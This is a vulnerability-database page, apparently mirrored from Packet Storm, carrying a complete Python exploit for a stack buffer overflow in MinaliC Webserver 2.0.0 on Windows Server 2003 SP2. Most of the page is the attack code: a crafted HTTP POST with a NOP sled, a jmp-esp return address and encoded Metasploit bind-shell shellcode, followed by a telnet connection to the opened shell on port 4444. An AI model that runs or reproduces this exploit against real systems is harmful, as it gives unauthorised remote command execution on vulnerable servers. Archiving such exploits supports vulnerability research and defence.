Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MinaliC Webserver 2.0.0 Buffer Overflow

🗓️ 19 Apr 2013 00:00:00Reported by AntoniusType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

MinaliC Webserver 2.0.0 Buffer Overflow Post Method Remote Command Execution on Windows Server 2003 sp

Code
`#!/usr/bin/env python  
# Title : MinaliC Webserver 2.0.0 Post Method Remote Command Execution  
# (Works for Windows Server 2003 sp2 Only)  
#  
# Date: 12 Apr 2013  
#  
# Exploit Author: Antonius - (http://www.cr0security.com - http://www.codewall-security.com)  
#  
# Thanks : http://www.offensive-security.com , http://www.security-hooligan.com, http://www.techorganic.com & Indonesian Backtrack Team  
#  
# Vendor Homepage: http://minalic.sourceforge.net  
#  
# Version: MinaliC Webserver 2.0.0  
#  
# Tested on: Windows Server 2003 Service Pack 2, English  
#  
# Description:  
# Stack based buffer overflow occur when minalic 2.0.0 handles http post method. This exploit tested and works on windows server 2003 sp2 only.  
# Exploitation will failed if specify wrong path  
# Usage : ./exploit.py ip_address minalic_bin_path  
#cr0security@cr0security-Vostro1310:~/Desktop/ctp_exercise/working_exploit$ python exploit.py 192.168.1.2 'c:\minalic\bin'  
#Sending Exploit Please Wait  
#Trying 192.168.1.2...  
#Connected to 192.168.1.2.  
#Escape character is '^]'.  
#Microsoft Windows [Version 5.2.3790]  
#(C) Copyright 1985-2003 Microsoft Corp.  
#C:\minalic\bin>  
  
import socket, struct,os, sys, time  
  
if len(sys.argv) < 2 :  
print "MinaliC Webserver Post Method Remote Command Execution (Works for Windows Server 2003 sp2 Only)"  
print "Usage : ./exploit.py 'ip address' 'path of minalic binary'"   
print "Example : python exploit.py 192.168.1.2 'c:\minalic\bin'"  
sys.exit(1)  
ip = sys.argv[1]  
if len(sys.argv) > 2 :  
path_length = len(sys.argv[2])  
path = sys.argv[2]  
else :  
path_length = 14  
if path_length > 14 :  
#if path not at C:\minalic\bin we must recalculate preceed length to overwrite eip   
junk = "\x90" * (240 - (len(path) - 14))  
else :  
#default path at C:\minalic\bin  
junk = "\x90" * 240  
  
#only have 4 bytes, jmp for more  
first_stage = "\xeb\xd0" + "\x90" * 2  
  
#ecx points to our controlled buffer, so we do a jmp to ecx  
second_stage = "\x83\xc1\x04\xff\xe1"  
  
sec2 = junk + second_stage  
  
#0x7C86A01B jmp esp from ntdll.dll on windows server 2003  
ret = "\x1B\xA0\x86\x7C"  
  
host = "\xff" * 140  
  
# metasploit windows/shell_bind_tcp - 368 bytes  
# http://www.metasploit.com  
# Encoder: x86/shikata_ga_nai  
# VERBOSE=false, LPORT=4444, RHOST=127.0.0.1,  
shellcode = ("\xbd\x78\x69\xd9\xaa\xd9\xc0\xd9\x74\x24\xf4\x58\x2b\xc9" +  
"\xb1\x56\x83\xe8\xfc\x31\x68\x0f\x03\x68\x77\x8b\x2c\x56" +  
"\x6f\xc2\xcf\xa7\x6f\xb5\x46\x42\x5e\xe7\x3d\x06\xf2\x37" +  
"\x35\x4a\xfe\xbc\x1b\x7f\x75\xb0\xb3\x70\x3e\x7f\xe2\xbf" +  
"\xbf\xb1\x2a\x13\x03\xd3\xd6\x6e\x57\x33\xe6\xa0\xaa\x32" +  
"\x2f\xdc\x44\x66\xf8\xaa\xf6\x97\x8d\xef\xca\x96\x41\x64" +  
"\x72\xe1\xe4\xbb\x06\x5b\xe6\xeb\xb6\xd0\xa0\x13\xbd\xbf" +  
"\x10\x25\x12\xdc\x6d\x6c\x1f\x17\x05\x6f\xc9\x69\xe6\x41" +  
"\x35\x25\xd9\x6d\xb8\x37\x1d\x49\x22\x42\x55\xa9\xdf\x55" +  
"\xae\xd3\x3b\xd3\x33\x73\xc8\x43\x90\x85\x1d\x15\x53\x89" +  
"\xea\x51\x3b\x8e\xed\xb6\x37\xaa\x66\x39\x98\x3a\x3c\x1e" +  
"\x3c\x66\xe7\x3f\x65\xc2\x46\x3f\x75\xaa\x37\xe5\xfd\x59" +  
"\x2c\x9f\x5f\x36\x81\x92\x5f\xc6\x8d\xa5\x2c\xf4\x12\x1e" +  
"\xbb\xb4\xdb\xb8\x3c\xba\xf6\x7d\xd2\x45\xf8\x7d\xfa\x81" +  
"\xac\x2d\x94\x20\xcc\xa5\x64\xcc\x19\x69\x35\x62\xf1\xca" +  
"\xe5\xc2\xa1\xa2\xef\xcc\x9e\xd3\x0f\x07\xa9\xd3\xc1\x73" +  
"\xfa\xb3\x23\x84\xed\x1f\xad\x62\x67\xb0\xfb\x3d\x1f\x72" +  
"\xd8\xf5\xb8\x8d\x0a\xaa\x11\x1a\x02\xa4\xa5\x25\x93\xe2" +  
"\x86\x8a\x3b\x65\x5c\xc1\xff\x94\x63\xcc\x57\xde\x5c\x87" +  
"\x22\x8e\x2f\x39\x32\x9b\xc7\xda\xa1\x40\x17\x94\xd9\xde" +  
"\x40\xf1\x2c\x17\x04\xef\x17\x81\x3a\xf2\xce\xea\xfe\x29" +  
"\x33\xf4\xff\xbc\x0f\xd2\xef\x78\x8f\x5e\x5b\xd5\xc6\x08" +  
"\x35\x93\xb0\xfa\xef\x4d\x6e\x55\x67\x0b\x5c\x66\xf1\x14" +  
"\x89\x10\x1d\xa4\x64\x65\x22\x09\xe1\x61\x5b\x77\x91\x8e" +  
"\xb6\x33\xa1\xc4\x9a\x12\x2a\x81\x4f\x27\x37\x32\xba\x64" +  
"\x4e\xb1\x4e\x15\xb5\xa9\x3b\x10\xf1\x6d\xd0\x68\x6a\x18" +  
"\xd6\xdf\x8b\x09")  
  
agent = "User-Agent: " + "\x90" * (898 - len(shellcode)) + shellcode  
payload = "POST /" + sec2 + ret + first_stage + " HTTP/1.1\r\n" + "Host: " + host + "\r\n" + agent + "\r\n\r\n"  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((ip, 8080))  
s.send(payload)  
s.close()  
print "Sending Exploit Please Wait"  
time.sleep(15)  
os.system("telnet " + ip + " 4444")  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Apr 2013 00:00Current
0.5Low risk
Vulners AI Score0.5
minalic webserverbuffer overflowremote command executionwindows server 2003stack basedexploitantoniusoffensive securitysecurity hooligantechorganicindonesian backtrack teamvendor homepagetestedexploitationmetasploitshell bind tcpencoder
26